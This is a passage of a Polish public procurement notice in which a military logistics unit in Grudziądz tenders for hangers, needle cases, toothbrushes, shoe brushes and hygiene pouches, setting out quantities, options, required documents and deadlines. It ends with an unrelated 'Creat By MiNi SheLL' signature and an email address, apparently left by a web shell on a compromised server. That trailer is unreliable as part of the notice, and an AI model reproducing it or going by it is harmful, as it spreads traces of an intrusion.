zgodnie ze wskazanymi przez Zamawiającego normami oraz asortymentem, ilościami oraz wymaganiami określonymi oraz zgodnie z warunkami wyszczególnionymi Projektowanych warunkach Umowy w terminie do 30 dni kalendarzowych od dnia 06.01.2025 r. dla zakresu podstawowego.<br/>►Zakres podstawowy podmiot zamówienia:<br/>Wieszak - 3 000 szt.;<br/>Igielnik - 2 000 szt.;<br/>Kubek do mycia zębów - 1 100 szt.;<br/>Pudełko na mydło - 1 100 szt.;<br/>Szczoteczka do rąk - 1 100 szt.;<br/>Szczoteczka do zębów - 2 200 szt.;<br/>Szczotka do obuwia miękka - 1 000 szt.;<br/>Szczotka do obuwia twarda - 1 000 szt.;<br/>Woreczek na przybory do konserwacji - 1 200 szt.;<br/>Saszetka na środki higieny - 1 200 szt.<br/>►Miejsce dostawy: magazyn służby mundurowej, 13 Wojskowy Oddział Gospodarczy, ul. Legionów 54, budynek nr 26, 86-300 Grudziądz.<br/>►Wymagania ogólne dla oferowanego przedmiotu zamówienia:<br/>1) Oferowany produkt powinien być fabrycznie nowy, bez znamion użytkowania oraz być pełnowartościowy, kompletny w pierwszej kategorii. Ponadto powinien spełniać wymagania jakościowe i właściwości określone przez Zamawiającego oraz producenta danego wyrobu oraz gwarantować funkcjonalność i niezawodność wykorzystania w zakresie swego przeznaczenia.<br/>2) Przedmiot zamówienia w danej pozycji asortymentowej dostarczony do Zamawiającego winien być jednakowy tj. o takich samych uwarunkowaniach technicznych, właściwościach fizyko-chemicznych zarówno w zakresie podstawowym jak i opcjonalnym.<br/>3) Przedmiot zamówienia musi być dostarczony w oryginalnym, nienaruszonym opakowaniu producenta danego wyrobu, w sposób zapewniający zachowanie jego właściwości podczas transportu i przechowywania w warunkach magazynowych.<br/>4) Wykonawca powinien dostarczyć przedmiot zamówienia zgodny z określonymi przez Zamawiającymi parametrami.<br/>5) Wykonawca zobowiązany jest na własny koszt dostarczyć, rozładować, zapewnić wniesienie dostarczonych produktów do pomieszczenia wskazanego przez pracownika Zamawiającego, po uprzednim zawiadomieniu Zamawiającego o terminie dostawy.<br/>6) Wykonawca zabezpieczy należycie towar na czas przewozu i ponosi całkowitą odpowiedzialność za dostawę i jakość przedmiotu zamówienia do czasu protokolarnego odbioru przedmiotu zamówienia. <br/>7) Przedmiot zamówienia powinien być wyprodukowany najwcześniej w 2024 roku.<br/>8) Produkty powinny posiadać kod kreskowy EAN-8 (osiem cyfr) dla wyrobów detalicznych o bardzo małych gabarytach w opakowaniu producenta, gdzie kod kreskowy jest umieszczony na etykiecie spinającej wyrób lub EAN-13 (trzynaście cyfr) dla wyrobów detalicznych o małych gabarytach w opakowaniu producenta, gdzie kod kreskowy jest umieszczony na wyrobie, opakowaniu.<br/>9) Wyroby powinny posiadać kod kreskowy ITF-14 (czternaście cyfr) dla wyrobów umieszczanych w opakowaniach zbiorczych zawierających stałą ilość przedmiotów tego samego rodzaju, wzoru i rozmiaru.<br/>►Zakazuje się dokonywania podczas realizacji zamówienia, zdjęć, nagrań, zbierania danych z wykorzystywaniem aparatów latających, w tym BSP typu „Dron”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39136000-4 - Wieszaki na odzież</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39227110-3 - Igły krawieckie</p> <p class="mb-0">39224200-0 - Szczotki</p> <p class="mb-0">33711710-7 - Szczoteczki do zębów</p> <p class="mb-0">18930000-7 - Worki i torby</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> ►Zamawiający przewiduje możliwość skorzystania z prawa opcji określonego w art. 441 ustawy Pzp (prawo opcji). <br/>►Realizacja prawa opcji polegać będzie na zwiększeniu podstawowego zakresu ilościowego przedmiotu zamówienia o ilości wynikające z uzasadnionych potrzeb Zamawiającego, w sytuacjach określonych poniżej, z zastrzeżeniem nieprzewyższenia maksymalnej ilości opcji, określonej w postanowieniach umowy.<br/>Zasady realizacji przez Zamawiającego „opcji” oraz warunki są takie same jak dla zamówień realizowanych dla zakresu podstawowego umowy.<br/>►Zamawiający zastrzega, iż ilości określone poniżej są orientacyjne szacunkowe co oznacza, iż w zakresie realizacji prawa opcji Zamawiający może zamówić jeden, kilka lub wszystkie produkty w ilościach, na które jest zapotrzebowanie. <br/>►Zakres opcjonalny podmiot zamówienia:<br/>Wieszak - 3 000 szt.;<br/>Igielnik - 1 500 szt.;<br/>Kubek do mycia zębów - 1 100 szt.;<br/>Pudełko na mydło - 1 100 szt.;<br/>Szczoteczka do rąk - 1 100 szt.;<br/>Szczoteczka do zębów - 2 200 szt.;<br/>Szczotka do obuwia miękka - 1 000 szt.;<br/>Szczotka do obuwia twarda - 1 000 szt.;<br/>Woreczek na przybory do konserwacji - 1 200 szt.;<br/>Saszetka na środki higieny - 1 200 szt.<br/>►Zamawiający w przypadku skorzystania z prawa opcji nie jest zobowiązany w jej ramach do zamawiania każdego asortymentu składającego się na przedmiot umowy. Przedmiot zamówienia każdorazowo będzie określony potrzebami Zamawiającego, które są w pełni uzależnione od aktualnych nieprzewidzianych przedsięwzięć i potrzeb oraz posiadanych środków finansowych.<br/>►Powyższe oznacza, iż Zamawiający może zrealizować zamówienia w zwiększonych lub zmniejszonych ilościach poszczególnych produktów niż ustalone powyżej, jak i Zamawiający może nie wykorzystać poszczególnych produktów w ogóle. Zamówienia wynikające z prawa opcji będą realizowane w ramach ustalonej w umowie ilości opcji. Wartość opcji jest maksymalną wartością jaką może zapłacić Zamawiający za realizację zamówień.<br/>Granicą realizacji opcji będzie jej maksymalna wartość określona w postanowieniach umowy.<br/>►Opcja będzie miała zastosowanie w sytuacjach niemożliwych do przewidzenia w dniu zawarcia umowy, spowodowanych w szczególności nieprzewidzianymi przedsięwzięciami, ale niemożliwymi do określenia co do ilości wcielanych do służby żołnierzy i zatrudnianych pracowników, które nie są znane ani prognozowane na obecnym etapie wszczynanego postępowania. <br/>►Ceny jednostkowe dla zakresu opcji są tożsame odpowiednio dla poszczególnych przedmiotów jak dla zakresu podstawowego.<br/>►Termin realizacji zamówienia w ramach opcji wynosi 7 dni kalendarzowych od dnia otrzymania zamówienia przez Wykonawcę, z zastrzeżeniem, ze ostatnie zamówienie zostanie złożone Wykonawcy nie później niż na 7 dni kalendarzowych przed upływem terminu obowiązywania umowy (tj. 150-stu dni kalendarzowych od dnia zawarcia umowy). <br/>►Zastosowanie Zamawiającego z opcji nie wymaga aneksu, realizacja przez Zamawiającego prawa opcji nie stanowi zmiany umowy.<br/>►Zamawiający zastrzega, że realizacja zamówień w ramach „opcji” jest uprawnieniem Zamawiającego a nie bezwzględnym zobowiązaniem. Brak realizacji zamówień w ramach „opcji” nie będzie rodzić po stronie Zamawiającego żadnych roszczeń ze strony Wykonawcy w stosunku do Zamawiającego. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający udzieli zamówienia Wykonawcy nie podlegającemu wykluczeniu, którego oferta uzyska największą liczbę punktów i jednocześnie spełni wszystkie wymagania przedmiotowe określone w prowadzonym postępowaniu o udzielenie zamówienia publicznego.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">►Oświadczenie o braku podstaw do wykluczenia Wykonawcy z postępowania o udzielenie zamówienia publicznego (art. 108 ustawy Pzp) i spełnieniu warunków udziału w postępowaniu.<br/>►Oświadczenie o braku podstaw do wykluczenia na podstawie art. 7 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. 2024 r., poz. 507).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Spełnianie wymagań Zamawiającego w postępowaniu nastąpi w myśl zasady spełnia/nie spełnia zgodnie z oświadczeniem złożonym na podstawie art. 125 ust. 1 ustawy Pzp oraz oświadczeń zawartych w Informacji o Wykonawcy.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> ►Przedmiotowe środki dowodowe - dokumenty potwierdzające, że oferowany przedmiot zamówienia spełnia wymagania Zamawiającego.<br/>►Wymóg dotyczy:<br/>Pozycje asortymentowe zadanie nr 1:<br/>1.	Mydło toaletowe (100 g)<br/>2.	Pasta do mycia rąk (500g)<br/>3.	Krem do rąk (50 ml)<br/>4.	Pasta do obuwia (40 g)<br/>5.	Pasta do obuwia w płynie (60 ml)<br/>6.	Pianka do golenia (200 ml)<br/>7.	Maszynka jednorazowa do golenia<br/>8.	Pasta do zębów (75 ml)<br/>9.	Impregnat do obuwia specjalnego (125 ml)<br/>Pozycje asortymentowe zadanie nr 2:<br/>1.	Wieszak<br/>2. Igielnik<br/>3.	Kubek do mycia zębów<br/>4.	Pudełko na mydło<br/>5.	Szczoteczka do rąk<br/>6.	Szczoteczka do zębów<br/>7.	Szczoteczka do obuwia miękka<br/>8.	Szczoteczka do obuwia twarda<br/>9.	Worek na przybory do konserwacji<br/>10.	Saszetka na środki higieny<br/>►Wykonawca jest zobowiązany przedłożyć:<br/>Informacje: <br/>- nazwa handlowa produktu<br/>oraz<br/>- nazwa producenta<br/>oraz<br/>- karty wyrobów składające się z danych:<br/>a) oznaczenie, której pozycji asortymentowej dane i zobrazowanie dotyczy według formularza ofertowego<br/>b) zdjęcie / rysunek poglądowy towaru, który będzie dostarczany w przypadku wyboru oferty Wykonawcy (Zamawiający dopuszcza wydruki etykiet z internetu, kopię, zdjęcie)<br/>c) krótki merytoryczny opis produktu – charakterystyka w języku polskim co najmniej <br/>w zakresie:<br/>zadanie nr 1 – dla każdego produktu Wykonawca podaje dane w zakresie:<br/>a) cel stosowania produktu<br/>b) podstawowy skład / zawartość składników (podobnie jak określenie dokonane przez Zamawiającego)<br/>c) gramatura / pojemność<br/>d) rodzaj opakowania<br/>e) data terminu przydatności do użycia:<br/>- dla poz. 1, 6 i 9 nie krótsza niż 24 miesiące od dnia dostawy, <br/>- dla poz. 2, 4, 5 nie krótsza niż 20 miesięcy od dnia dostawy, <br/>- dla poz. 3 i 8 nie krótsza niż 12 miesięcy od daty otwarcia. <br/>zadanie nr 2 – dla każdego produktu Wykonawca podaje dane w zakresie:<br/>a) cel stosowania produktu<br/>b) podstawowy opis – ogólne informacje i/lub parametry o ile dotyczy.<br/>►W przypadku, gdy oferowany produkt jest dokładnie tożsamy z opisem przedmiotu dokonanym przez Zamawiającego, dopuszcza się wykorzystanie przez Wykonawców danych zawartych &#34;Opisie przedmiotu zamówienia&#34; z oświadczeniem Wykonawcy, iż oferowany produkt jest identyczny co do wykazanych przez Zamawiającego każdego z parametrów.<br/>►Jeżeli Wykonawca nie złoży przedmiotowych środków dowodowych lub złożone środki dowodowe są niekompletne, Zamawiający wezwie Wykonawcę do ich złożenia lub uzupełnienia w wyznaczonym terminie, z wyjątkiem sytuacji, gdy oferta podlegać będzie odrzuceniu na mocy art. 226 Pzp. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> ►Informacje: <br/>- nazwa handlowa produktu<br/>oraz<br/>- nazwa producenta<br/>oraz<br/>- karty wyrobów składające się z danych:<br/>a) oznaczenie, której pozycji asortymentowej dane i zobrazowanie dotyczy według formularza ofertowego<br/>b) zdjęcie / rysunek poglądowy towaru, który będzie dostarczany w przypadku wyboru oferty Wykonawcy (Zamawiający dopuszcza wydruki etykiet z internetu, kopię, zdjęcie)<br/>c) krótki merytoryczny opis produktu – charakterystyka w języku polskim co najmniej <br/>w zakresie:<br/>zadanie nr 1 – dla każdego produktu Wykonawca podaje dane w zakresie:<br/>a) cel stosowania produktu<br/>b) podstawowy skład / zawartość składników (podobnie jak określenie dokonane przez Zamawiającego)<br/>c) gramatura / pojemność<br/>d) rodzaj opakowania<br/>e) data terminu przydatności do użycia:<br/>- dla poz. 1, 6 i 9 nie krótsza niż 24 miesiące od dnia dostawy, <br/>- dla poz. 2, 4, 5 nie krótsza niż 20 miesięcy od dnia dostawy, <br/>- dla poz. 3 i 8 nie krótsza niż 12 miesięcy od daty otwarcia. <br/>zadanie nr 2 – dla każdego produktu Wykonawca podaje dane w zakresie:<br/>a) cel stosowania produktu<br/>b) podstawowy opis – ogólne informacje i/lub parametry o ile dotyczy. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Każdy Wykonawca do upływu terminu składania ofert zobowiązany jest złożyć:<br/>►Formularz ofertowy;<br/>►Oświadczenie o braku podstaw do wykluczenia Wykonawcy z postępowania o udzielenie zamówienia publicznego (art. 108 ustawy Pzp) - aktualne na dzień składania ofert;<br/>► Informację o Wykonawcy;<br/>► Oświadczenie o braku podstaw do wykluczenia na podstawie art. 7 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. 2024 r., poz. 507) - aktualne na dzień składania ofert.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia na zasadach określonych w art. 58 ustawy Pzp, brak podstaw do wykluczenia musi wykazać każdy z Wykonawców składając odrębnie wymagane oświadczenia.<br/>►Pełnomocnictwo do działania innych/ej osób/y w imieniu Wykonawcy w oryginale lub notarialnie poświadczonej kopii pełnomocnictwa – o ile dotyczy.<br/>Pełnomocnictwo do złożenia oferty musi być złożone w oryginale w takiej samej formie, jak składana oferta (tj. w formie elektronicznej lub postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym).<br/>Dopuszcza się także złożenie elektronicznej kopii (skanu) pełnomocnictwa sporządzonego uprzednio w formie pisemnej, w formie elektronicznego poświadczenia sporządzonego stosownie do art. 97 § 2 ustawy z dnia 14 lutego 1991 r. - Prawo o notariacie, które to poświadczenie notariusz opatruje odpowiednio kwalifikowanym podpisem elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej kwalifikowanym podpisem, podpisem zaufanym lub podpisem osobistym mocodawcy.<br/>Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> ►Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, np. łącząc się w konsorcja lub spółki cywilne lub inną formę prawną.<br/>1) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia żaden z Wykonawców nie może podlegać wykluczeniu w okolicznościach.<br/>2) Przepisy dotyczące „pojedynczego” Wykonawcy stosuje się odpowiednio i takim samym skutkiem prawnym do Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>3) Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. W przypadku, o którym mowa Wykonawca musi złożyć wraz z ofertą stosowne pełnomocnictwo uprawniające do wykonywania określonych czynności w postępowaniu o udzieleniu zamówienia publicznego.<br/>4) Dokumenty składane przez członków konsorcjum czy wspólników spółki cywilnej, w tym oświadczenia muszą być podpisane przez wyznaczonego pełnomocnika lub osobę upoważnioną do reprezentowania danego podmiotu.<br/>5) W toku postępowania wszelka korespondencja ze strony Zamawiającego będzie kierowana do pełnomocnika danego podmiotu ubiegającego się wspólnie o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający wobec treści art. 455 ust. 1 pkt. 1 ustawy Pzp przewiduje możliwość wprowadzenia zmiany do treści zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy w zakresie:<br/>1) udziału podwykonawcy (lub jego zmiana) na etapie realizacji umowy jeżeli Wykonawca na żądanie Zamawiającego przedstawi oświadczenia lub dokumenty potwierdzające brak podstaw do wykluczenia wobec tego podwykonawcy;<br/>2) zmiany zakresu podwykonawstwa;<br/>Zmiany jak powyżej wymagają zachowania formy pisemnej (aneks) oraz pisemnego wniosku jednej ze Stron o zmianę wraz z uzasadnieniem i dokumentami. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-11-06 10:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/1004574</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-11-06 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-12-05</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> ►Wykonawca przekazując informacje stanowiące tajemnicę przedsiębiorstwa jest zobowiązany do wykazania spełnienia przesłanek określonych w art. 11 ust. 2 ustawy o zwalczaniu nieuczciwej konkurencji z dnia 16 kwietnia 1993 r. w tym: jaką wartość gospodarczą te informacje stanowią oraz czy są one w jakikolwiek sposób dostępne dla innych podmiotów.<br/>Zastrzeżenie „tajemnica przedsiębiorstwa” Zamawiający uzna za skuteczne wyłącznie w sytuacji kiedy Wykonawca oprócz samego zastrzeżenia, jednocześnie wykaże, iż dane informacje stanowią tajemnicę przedsiębiorstwa – art. 18 ust. 3 ustawy Pzp.<br/>►Wykonawca ponosi wszelkie koszty związane z przygotowaniem i złożeniem oferty, niezależnie od wyniku postępowania. Zamawiający nie odpowiada za koszty poniesione w tym zakresie przez Wykonawców.

Creat By MiNi SheLL
Email: jattceo@gmail.com